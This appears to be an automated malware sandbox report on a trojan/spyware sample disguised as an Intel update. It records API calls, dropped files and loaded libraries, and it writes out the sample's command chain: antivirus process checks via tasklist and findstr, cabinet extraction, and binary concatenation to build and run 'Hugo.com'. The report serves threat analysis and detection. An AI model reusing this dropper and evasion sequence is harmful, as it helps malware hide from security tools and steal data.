Code function: 13_2_00FA9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

13_2_00FA9FD2

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F2FFE0 CloseHandle,NtProtectVirtualMemory,

13_2_00F2FFE0

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F84763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

13_2_00F84763

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F71B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

13_2_00F71B4D

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		0_2_00403883
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F7F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		13_2_00F7F20D

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	File created: C:\Windows\FranchiseReed	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	File created: C:\Windows\ChristineSnapshot	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	File created: C:\Windows\BmAccurate	Jump to behavior

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Code function: 0_2_004074BB	0_2_004074BB
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F38017	13_2_00F38017
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F1E1F0	13_2_00F1E1F0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F2E144	13_2_00F2E144
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F322A2	13_2_00F322A2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F122AD	13_2_00F122AD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F4A26E	13_2_00F4A26E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F2C624	13_2_00F2C624
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F9C8A4	13_2_00F9C8A4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F4E87F	13_2_00F4E87F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F46ADE	13_2_00F46ADE
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F82A05	13_2_00F82A05
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F78BFF	13_2_00F78BFF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F2CD7A	13_2_00F2CD7A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F3CE10	13_2_00F3CE10
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F47159	13_2_00F47159
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F19240	13_2_00F19240
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00FA5311	13_2_00FA5311
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F196E0	13_2_00F196E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F31704	13_2_00F31704
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F31A76	13_2_00F31A76
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F37B8B	13_2_00F37B8B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F19B60	13_2_00F19B60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F37DBA	13_2_00F37DBA
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F31D20	13_2_00F31D20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F31FE7	13_2_00F31FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Code function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: String function: 00F2FD52 appears 40 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: String function: 00F30DA0 appears 46 times

Source: [UPD]Intel_Unit.2.1.exe

Static PE information: invalid certificate

Source: [UPD]Intel_Unit.2.1.exe, 00000000.00000002.2261740316.000000000067F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs [UPD]Intel_Unit.2.1.exe
Source: [UPD]Intel_Unit.2.1.exe, 00000000.00000003.2258232706.000000000067F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs [UPD]Intel_Unit.2.1.exe

Source: [UPD]Intel_Unit.2.1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@26/21@12/2

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F841FA GetLastError,FormatMessageW,

13_2_00F841FA

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F72010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		13_2_00F72010
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F71A0B AdjustTokenPrivileges,CloseHandle,		13_2_00F71A0B

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe

0_2_004044A5

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F7DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

13_2_00F7DD87

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F83A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

13_2_00F83A0E

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Illustrations

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_03

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe

File created: C:\Users\user\AppData\Local\Temp\nsiCCCC.tmp

Jump to behavior

Source: [UPD]Intel_Unit.2.1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Hugo.com, 0000000D.00000003.2706375282.00000000049EC000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2695000319.00000000049D6000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe

File read: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe "C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe"
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cloudy Cloudy.cmd & Cloudy.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 686536
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Justify
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Backing" Kelly
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 686536\Hugo.com + Ware + Sanyo + Pg + Folk + Lifetime + Robert + Enlarge + Hence 686536\Hugo.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Selection + ..\Suse + ..\Illustrations + ..\Alerts + ..\Smart + ..\Steps + ..\Lovers y
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com Hugo.com y
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cloudy Cloudy.cmd & Cloudy.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 686536	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Justify	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Backing" Kelly	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 686536\Hugo.com + Ware + Sanyo + Pg + Folk + Lifetime + Robert + Enlarge + Hence 686536\Hugo.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Selection + ..\Suse + ..\Illustrations + ..\Alerts + ..\Smart + ..\Steps + ..\Lovers y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com Hugo.com y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe

